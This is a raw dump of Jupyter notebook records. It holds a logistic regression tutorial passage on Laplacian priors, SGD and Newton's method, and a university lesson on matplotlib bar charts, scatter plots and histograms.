"### 4.2 MAP estimation with Laplacian prior\n\nIf we assume that ${\\bf W}$ follows a multivariate zero-mean Laplacian distribution given by\n\n$$\np_{\\bf W}({\\bf w}) = \\frac{1}{(2 C)^{N}} \\exp\\left(-\\frac{1}{C}\\|{\\bf w}\\|_1\\right)\n$$\n\n(where $\\|{\\bf w}\\|=|w_1|+\\ldots+|w_N|$ is the $L_1$ norm of ${\\bf w}$), the MAP estimate becomes\n\n\\begin{align}\n\\hat{\\bf w}_{\\text{MAP}} \n &= \\arg\\min_{\\bf w} \\left\\{\\text{NLL}({\\bf w}) + \\frac{1}{C}\\|{\\bf w}\\|_1\n \\right\\}\n\\end{align}\n\nThe additional term introduced by the prior in the optimization algorithm is usually named the *regularization term*. It is usually very effective to avoid overfitting when the dimension of the weight vectors is high. Parameter $C$ is named the *inverse regularization strength*.",
"_____no_output_____"
],
[
"**Exercise 7**: Derive the gradient descent rules for MAP estimation of the logistic regression weights with Laplacian prior.",
"_____no_output_____"
],
[
"## 5. Other optimization algorithms\n\n### 5.1. Stochastic Gradient descent.\n\nStochastic gradient descent (SGD) is based on the idea of using a single sample at each iteration of the learning algorithm. The SGD rule for ML logistic regression is\n\n\\begin{align}\n{\\bf w}_{n+1} &= {\\bf w}_n \n + \\rho_n {\\bf z}^{(n)} \\left(y^{(n)}-\\hat{p}^{(n)}_n\\right)\n\\end{align}\n\nOnce all samples in the training set have been applied, the algorith can continue by applying the training set several times.\n\nThe computational cost of each iteration of SGD is much smaller than that of gradient descent, though it usually needs many more iterations to converge.",
"_____no_output_____"
],
[
"**Exercise 8**: Modify logregFit to implement an algorithm that applies the SGD rule.",
"_____no_output_____"
],
[
"### 5.2. Newton's method\n\nAssume that the function to be minimized, $C({\\bf w})$, can be approximated by its second order Taylor series expansion around ${\\bf w}_0$\n\n$$ \nC({\\bf w}) \\approx C({\\bf w}_0) \n+ \\nabla_{\\bf w}^\\top C({\\bf w}_0)({\\bf w}-{\\bf w}_0)\n+ \\frac{1}{2}({\\bf w}-{\\bf w}_0)^\\top{\\bf H}({\\bf w}_0)({\\bf w}-{\\bf w}_0)\n$$\n\nwhere ${\\bf H}({\\bf w}_k)$ is the <a href=https://en.wikipedia.org/wiki/Hessian_matrix> *Hessian* matrix</a> of $C$ at ${\\bf w}_k$. Taking the gradient of $C({\\bf w})$, and setting the result to ${\\bf 0}$, the minimum of C around ${\\bf w}_0$ can be approximated as\n\n$$ \n{\\bf w}^* = {\\bf w}_0 - {\\bf H}({\\bf w}_0)^{-1} \\nabla_{\\bf w}^\\top C({\\bf w}_0)\n$$\n\nSince the second order polynomial is only an approximation to $C$, ${\\bf w}^*$ is only an approximation to the optimal weight vector, but we can expect ${\\bf w}^*$ to be closer to the minimizer of $C$ than ${\\bf w}_0$. Thus, we can repeat the process, computing a second order approximation around ${\\bf w}^*$ and a new approximation to the minimizer.\n\n<a href=https://en.wikipedia.org/wiki/Newton%27s_method_in_optimization> Newton's method</a> is based on this idea. At each optization step, the function to be minimized is approximated by a second order approximation using a Taylor series expansion around the current estimate. As a result, the learning rule becomes\n\n$$\\hat{\\bf w}_{n+1} = \\hat{\\bf w}_{n} - \\rho_n {\\bf H}({\\bf w}_k)^{-1} \\nabla_{{\\bf w}}C({\\bf w}_k)\n$$\n",
"_____no_output_____"
],
[
"\nFor instance, for the MAP estimate with Gaussian prior, the *Hessian* matrix becomes\n\n$$\n{\\bf H}({\\bf w}) \n = \\frac{2}{C}{\\bf I} + \\sum_{k=0}^{K-1} g({\\bf w}^\\top {\\bf z}^{(k)}) \\left[1-g({\\bf w}^\\top {\\bf z}^{(k)})\\right]{\\bf z}^{(k)} ({\\bf z}^{(k)})^\\top\n$$\n\nDefining diagonal matrix\n\n$$\n{\\mathbf S}({\\bf w}) = \\text{diag}\\left[g({\\bf w}^\\top {\\bf z}^{(k)}) \\left(1-g({\\bf w}^\\top {\\bf z}^{(k)})\\right)\\right]\n$$\n\nthe Hessian matrix can be written in more compact form as\n\n$$\n{\\bf H}({\\bf w}) \n = \\frac{2}{C}{\\bf I} + {\\bf Z}^\\top {\\bf S}({\\bf w}) {\\bf Z}\n$$\n\nTherefore, the Newton's algorithm for logistic regression becomes\n\n\\begin{align}\n{\\bf w}_{n+1} = {\\bf w}_{n} + \n\\rho_n \n\\left(\\frac{2}{C}{\\bf I} + {\\bf Z}^\\top {\\bf S}({\\bf w}_{n})\n{\\bf Z}\n\\right)^{-1} \n{\\bf Z}^\\top \\left({\\bf y}-\\hat{\\bf p}_n\\right)\n\\end{align}\n\nSome variants of the Newton method are implemented in the <a href=\"http://scikit-learn.org/stable/\"> Scikit-learn </a> package.\n\n",
"_____no_output_____"
]
],
[
[
"def logregFit2(Z_tr, Y_tr, rho, n_it, C=1e4):\n\n # Compute Z's\n r = 2.0/C\n n_dim = Z_tr.shape[1]\n\n # Initialize variables\n nll_tr = np.zeros(n_it)\n pe_tr = np.zeros(n_it)\n w = np.random.randn(n_dim,1)\n\n # Running the gradient descent algorithm\n for n in range(n_it):\n p_tr = logistic(np.dot(Z_tr, w))\n \n sk = np.multiply(p_tr, 1-p_tr)\n S = np.diag(np.ravel(sk.T))\n\n # Compute negative log-likelihood\n nll_tr[n] = - np.dot(Y_tr.T, np.log(p_tr)) - np.dot((1-Y_tr).T, np.log(1-p_tr))\n\n # Update weights\n invH = np.linalg.inv(r*np.identity(n_dim) + np.dot(Z_tr.T, np.dot(S, Z_tr)))\n\n w += rho*np.dot(invH, np.dot(Z_tr.T, Y_tr - p_tr))\n\n return w, nll_tr",
"_____no_output_____"
],
[
"# Parameters of the algorithms\nrho = float(1)/50 # Learning step\nn_it = 500 # Number of iterations\nC = 1000\ng = 4\n\n# Compute Z_tr\npoly = PolynomialFeatures(degree=g)\nZ_tr = poly.fit_transform(X_tr)\n# Normalize columns (this is useful to make algorithms more stable).)\nZn, mz, sz = normalize(Z_tr[:,1:])\nZ_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)\n\n# Compute Z_tst\nZ_tst = poly.fit_transform(X_tst)\nZn, mz, sz = normalize(Z_tst[:,1:], mz, sz)\nZ_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)\n\n# Convert target arrays to column vectors\nY_tr2 = Y_tr[np.newaxis].T\nY_tst2 = Y_tst[np.newaxis].T\n\n# Running the gradient descent algorithm\nw, nll_tr = logregFit2(Z_tr, Y_tr2, rho, n_it, C)\n\n# Classify training and test data\np_tr, D_tr = logregPredict(Z_tr, w)\np_tst, D_tst = logregPredict(Z_tst, w)\n \n# Compute error rates\nE_tr = D_tr!=Y_tr\nE_tst = D_tst!=Y_tst\n\n# Error rates\npe_tr = float(sum(E_tr)) / n_tr\npe_tst = float(sum(E_tst)) / n_tst\n\n# NLL plot.\nplt.plot(range(n_it), nll_tr,'b.:', label='Train')\nplt.xlabel('Iteration')\nplt.ylabel('Negative Log-Likelihood')\nplt.legend()\n\nprint('The final error rates are:')\nprint('- Training:', str(pe_tr))\nprint('- Test:', str(pe_tst))\nprint('The NLL after training is:', str(nll_tr[len(nll_tr)-1]))",
"_____no_output_____"
]
],
[
[
"## 6. Logistic regression in Scikit Learn.\n\nThe <a href=\"http://scikit-learn.org/stable/\"> scikit-learn </a> package includes an efficient implementation of <a href=\"http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html#sklearn.linear_model.LogisticRegression\"> logistic regression</a>. To use it, we must first create a classifier object, specifying the parameters of the logistic regression algorithm.",
"_____no_output_____"
]
],
[
[
"# Create a logistic regression object.\nLogReg = linear_model.LogisticRegression(C=1.0)\n\n# Compute Z_tr\npoly = PolynomialFeatures(degree=g)\nZ_tr = poly.fit_transform(Xn_tr)\n# Normalize columns (this is useful to make algorithms more stable).)\nZn, mz, sz = normalize(Z_tr[:,1:])\nZ_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)\n\n# Compute Z_tst\nZ_tst = poly.fit_transform(Xn_tst)\nZn, mz, sz = normalize(Z_tst[:,1:], mz, sz)\nZ_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)\n\n# Fit model to data.\nLogReg.fit(Z_tr, Y_tr)\n\n# Classify training and test data\nD_tr = LogReg.predict(Z_tr)\nD_tst = LogReg.predict(Z_tst)\n \n# Compute error rates\nE_tr = D_tr!=Y_tr\nE_tst = D_tst!=Y_tst\n\n# Error rates\npe_tr = float(sum(E_tr)) / n_tr\npe_tst = float(sum(E_tst)) / n_tst\n\nprint('The final error rates are:')\nprint('- Training:', str(pe_tr))\nprint('- Test:', str(pe_tst))\n\n# Compute Z_grid\nZ_grid = poly.fit_transform(X_grid)\nn_grid = Z_grid.shape[0]\nZn, mz, sz = normalize(Z_grid[:,1:], mz, sz)\nZ_grid = np.concatenate((np.ones((n_grid,1)), Zn), axis=1)\n\n# Compute the classifier output for all samples in the grid.\ndd = LogReg.predict(Z_grid)\npp = LogReg.predict_proba(Z_grid)[:,1]\npp = pp.reshape(xx.shape)\n\n# Paint output maps\npylab.rcParams['figure.figsize'] = 6, 6 # Set figure size\n\nplt.plot(x0c0, x1c0,'r.', label=labels[c0])\nplt.plot(x0c1, x1c1,'g+', label=labels[c1])\nplt.xlabel('$x_' + str(ind[0]) + '$')\nplt.ylabel('$x_' + str(ind[1]) + '$')\nplt.axis('equal')\n\nplt.contourf(xx, yy, pp, cmap=plt.cm.copper)\nplt.legend(loc='best')\n\nplt.contour(xx, yy, pp, levels=[0.5],\n colors='b', linewidths=(3,))\n\nplt.colorbar(CS, ticks=[0, 0.5, 1])\n\nplt.show()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb2b5a03f610185aa2f91710326a748266471e42 | 254,812 | ipynb | Jupyter Notebook | engr1330jb/lessons/lesson15/.ipynb_checkpoints/lesson15-checkpoint.ipynb | dustykat/engr-1330-psuedo-course | 3e7e31a32a1896fcb1fd82b573daa5248e465a36 | [
"CC0-1.0"
] | null | null | null | engr1330jb/lessons/lesson15/.ipynb_checkpoints/lesson15-checkpoint.ipynb | dustykat/engr-1330-psuedo-course | 3e7e31a32a1896fcb1fd82b573daa5248e465a36 | [
"CC0-1.0"
] | null | null | null | engr1330jb/lessons/lesson15/.ipynb_checkpoints/lesson15-checkpoint.ipynb | dustykat/engr-1330-psuedo-course | 3e7e31a32a1896fcb1fd82b573daa5248e465a36 | [
"CC0-1.0"
] | null | null | null | 190.016406 | 23,080 | 0.891339 | [
[
[
"<div class=\"alert alert-block alert-info\">\n <b><h1>ENGR 1330 Computational Thinking with Data Science </h1></b> \n</div> \n\nCopyright © 2021 Theodore G. Cleveland and Farhang Forghanparast\n\nLast GitHub Commit Date: \n \n# 15: The `matplotlib` package\n- explore different types of plots\n- user defined functions for specific plotting",
"_____no_output_____"
],
[
"---\n\n## Objectives\n- Demonstrate common plot types and their uses\n- Define how to plot experimental data (observations) and theoretical data (model)\n 1. Marker conventions\n 2. Line conventions\n 3. Legends\n\n---\n\n### About `matplotlib`\nQuoting from: https://matplotlib.org/tutorials/introductory/pyplot.html#sphx-glr-tutorials-introductory-pyplot-py\n\n`matplotlib.pyplot` is a collection of functions that make matplotlib work like MATLAB. Each pyplot function makes some change to a figure: e.g., creates a figure, creates a plotting area in a figure, plots some lines in a plotting area, decorates the plot with labels, etc.\n\nIn `matplotlib.pyplot` various states are preserved across function calls, so that it keeps track of things like the current figure and plotting area, and the plotting functions are directed to the current axes (please note that \"axes\" here and in most places in the documentation refers to the axes part of a figure and not the strict mathematical term for more than one axis).\n\n**Computational thinking (CT)** concepts involved are:\n\n- `Decomposition` : Break a problem down into smaller pieces; separating plotting from other parts of analysis simplifies maintenace of scripts\n- `Abstraction` : Pulling out specific differences to make one solution work for multiple problems; wrappers around generic plot calls enhances reuse \n- `Algorithms` : A list of steps that you can follow to finish a task; Often the last step and most important to make professional graphics to justify the expense (of paying you to do engineering) to the client.",
"_____no_output_____"
],
[
"## Background\n\nData are not always numerical. \nData can music (audio files), or places on a map (georeferenced attributes files), images (various imge files, e.g. .png, jpeg)\n\nThey can also be categorical into which you can place individuals:\n- The individuals are cartons of ice-cream, and the category is the flavor in the carton\n- The individuals are professional basketball players, and the category is the player's team.\n\n---\n\n### Line Charts\nA line chart or line plot or line graph or curve chart is a type of chart which displays information as a series of data points called 'markers' connected by straight line segments.\n\nIt is a basic type of chart common in many fields. It is similar to a scatter plot (below) except that the measurement points are **ordered** (typically by their x-axis value) and joined with straight line segments. \n\nA line chart is often used to visualize a trend in data over intervals of time – a time series – thus the line is often drawn chronologically. \n\nThe x-axis spacing is sometimes tricky, hence line charts can unintentionally decieve - so be careful that it is the appropriate chart for your application. \n\nWe examined line charts in the prior lesson, so lets move on to other useful charts.\n\n---\n\n### Bar Graphs\n\nBar charts (graphs) are good display tools to graphically represent categorical information.\nThe bars are evenly spaced and of constant width. \nThe height/length of each bar is proportional to the `relative frequency` of the corresponding category.\n\n`Relative frequency` is the ratio of how many things in the category to how many things in the whole collection.\n\nThe example below uses `matplotlib` to create a box plot for the ice cream analogy, the example is adapted from an example at https://www.geeksforgeeks.org/bar-plot-in-matplotlib/",
"_____no_output_____"
]
],
[
[
"ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model \nimport matplotlib.pyplot # the python plotting library\n\nflavors = list(ice_cream.keys()) # make a list object based on flavors\ncartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!\n\nmyfigure = matplotlib.pyplot.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio\n\n# Built the plot\nmatplotlib.pyplot.bar(flavors, cartons, color ='teal', width = 0.4) \nmatplotlib.pyplot.xlabel(\"Flavors\") \nmatplotlib.pyplot.ylabel(\"No. of Cartons in Stock\") \nmatplotlib.pyplot.title(\"Current Ice Cream in Storage\") \nmatplotlib.pyplot.show() ",
"_____no_output_____"
]
],
[
[
"---\n\nLets tidy up the script so it is more understandable, a small change in the import statement makes a simpler to read (for humans) script - also changed the bar colors just 'cause!",
"_____no_output_____"
]
],
[
[
"ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model \nimport matplotlib.pyplot as plt # the python plotting library\n\nflavors = list(ice_cream.keys()) # make a list object based on flavors\ncartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!\n\nmyfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio\n\n# Built the plot\nplt.bar(flavors, cartons, color ='lightblue', width = 0.4) \nplt.xlabel(\"Flavors\") \nplt.ylabel(\"No. of Cartons in Stock\") \nplt.title(\"Current Ice Cream in Storage\") \nplt.show() ",
"_____no_output_____"
]
],
[
[
"---\n\nNow lets deconstruct the script a bit:\n\n ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model \n import matplotlib.pyplot as plt # the python plotting library\n\n flavors = list(ice_cream.keys()) # make a list object based on flavors\n cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!\n\nThis part of the code creates a dictionary object, keys are the flavors, values are the carton counts (not the best way, but good for our learning needs). Next we import the python plotting library from `matplotlib` and name it **plt** to keep the script a bit easier to read.\n\n\n\nNext we use the list method to create two lists from the dictionary, **flavors** and **cartons**. Keep this in mind plotting is usually done on lists, so we need to prepare the structures properly.\n\nThe next statement\n\n myfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio\n \nUses the figure class in **pyplot** from **matplotlib** to make a figure object named myfigure, the plot is built into this object. Every call to a method in `plt` adds content to `myfigure` until we send the instruction to render the plot (`plt.show()`)\n\nThe next portion of the script builds the plot:\n \n plt.bar(flavors, cartons, color ='orange', width = 0.4) # Build a bar chart, plot series flavor on x-axis, plot series carton on y-axis. Make the bars orange, set bar width (units unspecified)\n plt.xlabel(\"Flavors\") # Label the x-axis as Flavors\n plt.ylabel(\"No. of Cartons in Stock\") # Label the x-axis as Flavors\n plt.title(\"Current Ice Cream in Storage\") # Title for the whole plot\n \nThis last statement renders the plot to the graphics device (probably localhost in the web browser)\n\n plt.show() \n \n---\n\nNow lets add another set of categories to the plot and see what happens",
"_____no_output_____"
]
],
[
[
"ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model \neaters = {'Cats':6, 'Dogs':5, 'Ferrets':19} # build a data model \nimport matplotlib.pyplot as plt # the python plotting library\n\nflavors = list(ice_cream.keys()) # make a list object based on flavors\ncartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!\n\nanimals = list(eaters.keys()) \nbeasts = list(eaters.values()) \nmyfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio\n\n# Built the plot\nplt.bar(flavors, cartons, color ='orange', width = 0.4) \nplt.bar(animals, beasts, color ='green', width = 0.4) \nplt.xlabel(\"Flavors\") \nplt.ylabel(\"Counts: Cartons and Beasts\") \nplt.title(\"Current Ice Cream in Storage\") \nplt.show() ",
"_____no_output_____"
]
],
[
[
"---\n\nNow suppose we want horizontal bars we can search pyplot for such a thing. If one types horizontal bar chart into the pyplot search engine there is a link that leads to:\n\n\n\nWhich has the right look! If we examine the script there is a method called `barh` so lets try that.\n\n```{note} \nUse the search engines to find out things you need to accomplish a task.\n```",
"_____no_output_____"
]
],
[
[
"ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model \neaters = {'Cats':6, 'Dogs':5, 'Ferrets':19} # build a data model \nimport matplotlib.pyplot as plt # the python plotting library\n\nflavors = list(ice_cream.keys()) # make a list object based on flavors\ncartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!\n\nanimals = list(eaters.keys()) \nbeasts = list(eaters.values()) \nmyfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio\n\n# Built the plot\nplt.barh(flavors, cartons, color ='orange') \nplt.barh(animals, beasts, color ='green') \nplt.xlabel(\"Flavors\") \nplt.ylabel(\"Counts: Cartons and Beasts\") \nplt.title(\"Current Ice Cream in Storage\") \nplt.show() ",
"_____no_output_____"
]
],
[
[
"---\n\nNow using pandas, we can build bar charts a bit easier.",
"_____no_output_____"
]
],
[
[
"import pandas as pd\n\nmy_data = {\n \"Flavor\": ['Chocolate', 'Strawberry', 'Vanilla'],\n \"Number of Cartons\": [16, 5, 9]\n }\ndf = pd.DataFrame(my_data)\ndf.head()",
"_____no_output_____"
],
[
"df.plot.bar(x='Flavor', y='Number of Cartons', color='magenta' )",
"_____no_output_____"
],
[
"df.plot.bar(x='Flavor', y='Number of Cartons', color=\"red\") # rotate the category labels",
"_____no_output_____"
],
[
"import numpy as np \nimport matplotlib.pyplot as plt \n \n \n# creating the dataset \ndata = {'C':20, 'C++':15, 'Java':30, \n 'Python':35} \ncourses = list(data.keys()) \nvalues = list(data.values()) \n \nfig = plt.figure(figsize = (10, 5)) \n \n# creating the bar plot \nplt.bar(courses, values, color ='maroon', \n width = 0.4) \n \nplt.xlabel(\"Courses offered\") \nplt.ylabel(\"No. of students enrolled\") \nplt.title(\"Students enrolled in different courses\") \nplt.show() ",
"_____no_output_____"
]
],
[
[
"--- \n\n### Scatter Plots\nA scatter plot (also called a scatterplot, scatter graph, scatter chart, scattergram, or scatter diagram) is a type of plot or mathematical diagram using Cartesian coordinates to display values for typically two variables for a set of data. If the points are coded (color/shape/size), one additional variable can be displayed. The data are displayed as a collection of points, each having the value of one variable determining the position on the horizontal axis and the value of the other variable determining the position on the vertical axis.\n\nA scatter plot can be used either when one continuous variable that is under the control of the experimenter and the other depends on it or when both continuous variables are independent. If a parameter exists that is systematically incremented and/or decremented by the other, it is called the control parameter or independent variable and is customarily plotted along the horizontal axis. The measured or dependent variable is customarily plotted along the vertical axis. If no dependent variable exists, either type of variable can be plotted on either axis and a scatter plot will illustrate only the degree of correlation (not causation) between two variables.\n\nA scatter plot can suggest various kinds of correlations between variables with a certain confidence interval. For example, weight and height, weight would be on y axis and height would be on the x axis. \nCorrelations may be positive (rising), negative (falling), or null (uncorrelated). \nIf the pattern of dots slopes from lower left to upper right, it indicates a positive correlation between the variables being studied. \nIf the pattern of dots slopes from upper left to lower right, it indicates a negative correlation. \n\nA line of best fit (alternatively called 'trendline') can be drawn in order to study the relationship between the variables. An equation for the correlation between the variables can be determined by established best-fit procedures. For a linear correlation, the best-fit procedure is known as linear regression and is guaranteed to generate a correct solution in a finite time. No universal best-fit procedure is guaranteed to generate a solution for arbitrary relationships. \nA scatter plot is also very useful when we wish to see how two comparable data sets agree and to show nonlinear relationships between variables.\n\nFurthermore, if the data are represented by a mixture model of simple relationships, these relationships will be visually evident as superimposed patterns.\n\nScatter charts can be built in the form of bubble, marker, or/and line charts.\n\nMuch of the above is verbatim/adapted from: https://en.wikipedia.org/wiki/Scatter_plot\n\nThe example below uses a database table from [galton_subset.csv](http://54.243.252.9/engr-1330-webroot/1-Lessons/Lesson12/galton_subset.csv)",
"_____no_output_____"
]
],
[
[
"# Example 1. A data file containing heights of fathers, mothers, and sons is to be examined\ndf = pd.read_csv('galton_subset.csv')\ndf['child']= df['son'] ; df.drop('son', axis=1, inplace = True) # rename son to child - got to imagine there are some daughters\ndf.head()",
"_____no_output_____"
],
[
"# build some lists\ndaddy = df['father'] ; mommy = df['mother'] ; baby = df['child']",
"_____no_output_____"
],
[
"myfamily = plt.figure(figsize = (10, 10)) # build a square drawing canvass from figure class\nplt.scatter(baby, daddy, c='red') # basic scatter plot\nplt.show()",
"_____no_output_____"
],
[
"# Looks lousy, needs some labels\nmyfamily = plt.figure(figsize = (10, 10)) # build a square drawing canvass from figure class\nplt.scatter(baby, daddy, c='red' , label='Father') # one plot series\nplt.scatter(baby, mommy, c='blue', label='Mother') # two plot series\nplt.xlabel(\"Child's height\")\nplt.ylabel(\"Parents' height\")\nplt.legend()\nplt.show() # render the two plots",
"_____no_output_____"
],
[
"# Repeat in pandas - The dataframe already is built\ndf.plot.scatter(x=\"child\", y=\"father\")",
"_____no_output_____"
],
[
"ax = df.plot.scatter(x=\"child\", y=\"father\", c=\"red\", label='Father')\ndf.plot.scatter(x=\"child\", y=\"mother\", c=\"blue\", label='Mother', ax=ax)\n\nax.set_xlabel(\"Child's height\")\nax.set_ylabel(\"Parents' Height\")",
"_____no_output_____"
],
[
"df.plot.scatter(x=\"child\", y=\"father\")",
"_____no_output_____"
]
],
[
[
"--- \n\n## Histograms\n\nQuoting from https://en.wikipedia.org/wiki/Histogram\n\n\"A histogram is an approximate representation of the distribution of numerical data. It was first introduced by Karl Pearson.[1] To construct a histogram, the first step is to \"bin\" (or \"bucket\") the range of values—that is, divide the entire range of values into a series of intervals—and then count how many values fall into each interval. The bins are usually specified as consecutive, non-overlapping intervals of a variable. The bins (intervals) must be adjacent, and are often (but not required to be) of equal size.\n\nIf the bins are of equal size, a rectangle is erected over the bin with height proportional to the frequency—the number of cases in each bin. A histogram may also be normalized to display \"relative\" frequencies. It then shows the proportion of cases that fall into each of several categories, with the sum of the heights equaling 1.\n\nHowever, bins need not be of equal width; in that case, the erected rectangle is defined to have its area proportional to the frequency of cases in the bin. The vertical axis is then not the frequency but frequency density—the number of cases per unit of the variable on the horizontal axis. Examples of variable bin width are displayed on Census bureau data below.\n\nAs the adjacent bins leave no gaps, the rectangles of a histogram touch each other to indicate that the original variable is continuous.\n\nHistograms give a rough sense of the density of the underlying distribution of the data, and often for density estimation: estimating the probability density function of the underlying variable. The total area of a histogram used for probability density is always normalized to 1. If the length of the intervals on the x-axis are all 1, then a histogram is identical to a relative frequency plot.\n\nA histogram can be thought of as a simplistic kernel density estimation, which uses a kernel to smooth frequencies over the bins. This yields a smoother probability density function, which will in general more accurately reflect distribution of the underlying variable. The density estimate could be plotted as an alternative to the histogram, and is usually drawn as a curve rather than a set of boxes. Histograms are nevertheless preferred in applications, when their statistical properties need to be modeled. The correlated variation of a kernel density estimate is very difficult to describe mathematically, while it is simple for a histogram where each bin varies independently.\n\nAn alternative to kernel density estimation is the average shifted histogram, which is fast to compute and gives a smooth curve estimate of the density without using kernels.\n\nThe histogram is one of the seven basic tools of quality control.\n\nHistograms are sometimes confused with bar charts. A histogram is used for continuous data, where the bins represent ranges of data, while a bar chart is a plot of categorical variables. Some authors recommend that bar charts have gaps between the rectangles to clarify the distinction.\"\n\nThe example below uses a database table from [top_movies.csv](http://54.243.252.9/engr-1330-webroot/1-Lessons/Lesson12/top_movies.csv)",
"_____no_output_____"
]
],
[
[
"import pandas as pd\n\ndf = pd.read_csv('top_movies.csv')\ndf.head()",
"_____no_output_____"
],
[
"df[[\"Gross\"]].hist()",
"_____no_output_____"
],
[
"df[[\"Gross\"]].hist(bins=100)",
"_____no_output_____"
],
[
"df.describe()",
"_____no_output_____"
]
],
[
[
"## Summary\n\n- line charts (previous lesson)\n- bar charts\n- scatterplots\n- histograms\n\n## References\n\n1. Grus, Joel (2015-04-14). Data Science from Scratch: First Principles with Python\n(Kindle Locations 1190-1191). O'Reilly Media. Kindle Edition. \n\n2. Call Expressions in \"Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science\" https://www.inferentialthinking.com/chapters/03/3/Calls.html\n\n3. Functions and Tables in \"Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science\" https://www.inferentialthinking.com/chapters/08/Functions_and_Tables.html\n\n4. Visualization in \"Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science\" https://www.inferentialthinking.com/chapters/07/Visualization.html\n\n5. Documentation; The Python Standard Library; 9. Numeric and Mathematical Modules https://docs.python.org/2/library/math.html\n\n6. https://matplotlib.org/gallery/lines_bars_and_markers/horizontal_barchart_distribution.html?highlight=horizontal%20bar%20chart\n\n7. https://www.geeksforgeeks.org/bar-plot-in-matplotlib/",
"_____no_output_____"
],
[
"## Addendum (Scripts that are Interactive)\n\n:::{note}\nThe addendum is intended for in-class demonstration\n:::",
"_____no_output_____"
]
],
[
[
"# python script to illustrate plotting\n# CODE BELOW IS ADAPTED FROM:\n# Grus, Joel (2015-04-14). Data Science from Scratch: First Principles with Python\n# (Kindle Locations 1190-1191). O'Reilly Media. Kindle Edition. \n#\nfrom matplotlib import pyplot as plt # import the plotting library from matplotlibplt.show()\n\nyears = [1950, 1960, 1970, 1980, 1990, 2000, 2010] # define one list for years\ngdp = [300.2, 543.3, 1075.9, 2862.5, 5979.6, 10289.7, 14958.3] # and another one for Gross Domestic Product (GDP)\nplt.plot( years, gdp, color ='green', marker ='o', linestyle ='solid') # create a line chart, years on x-axis, gdp on y-axis\n # what if \"^\", \"P\", \"*\" for marker?\n # what if \"red\" for color? \n # what if \"dashdot\", '--' for linestyle? \n\n\nplt.title(\"Nominal GDP\")# add a title\nplt.ylabel(\"Billions of $\")# add a label to the x and y-axes\nplt.xlabel(\"Year\")\nplt.show() # display the plot",
"_____no_output_____"
]
],
[
[
"Now lets put the plotting script into a function so we can make line charts of any two numeric lists",
"_____no_output_____"
]
],
[
[
"def plotAline(list1,list2,strx,stry,strtitle): # plot list1 on x, list2 on y, xlabel, ylabel, title\n from matplotlib import pyplot as plt # import the plotting library from matplotlibplt.show()\n plt.plot( list1, list2, color ='green', marker ='o', linestyle ='solid') # create a line chart, years on x-axis, gdp on y-axis\n plt.title(strtitle)# add a title\n plt.ylabel(stry)# add a label to the x and y-axes\n plt.xlabel(strx)\n plt.show() # display the plot\n return #null return",
"_____no_output_____"
],
[
"# wrapper\nyears = [1950, 1960, 1970, 1980, 1990, 2000, 2010] # define two lists years and gdp\ngdp = [300.2, 543.3, 1075.9, 2862.5, 5979.6, 10289.7, 14958.3]\nprint(type(years[0]))\nprint(type(gdp[0]))\nplotAline(years,gdp,\"Year\",\"Billions of $\",\"Nominal GDP\")",
"<class 'int'>\n<class 'float'>\n"
]
],
[
[
"## Example \nUse the plotting script and create a function that draws a straight line between two points.",
"_____no_output_____"
],
[
"```\n def Line():\n from matplotlib import pyplot as plt # import the plotting library from matplotlibplt.show()\n x1 = input('Please enter x value for point 1')\n y1 = input('Please enter y value for point 1')\n x2 = input('Please enter x value for point 2')\n y2 = input('Please enter y value for point 2')\n xlist = [x1,x2]\n ylist = [y1,y2]\n plt.plot( xlist, ylist, color ='orange', marker ='*', linestyle ='solid') \n #plt.title(strtitle)# add a title\n plt.ylabel(\"Y-axis\")# add a label to the x and y-axes\n plt.xlabel(\"X-axis\")\n plt.show() # display the plot\n return #null return\n```",
"_____no_output_____"
],
[
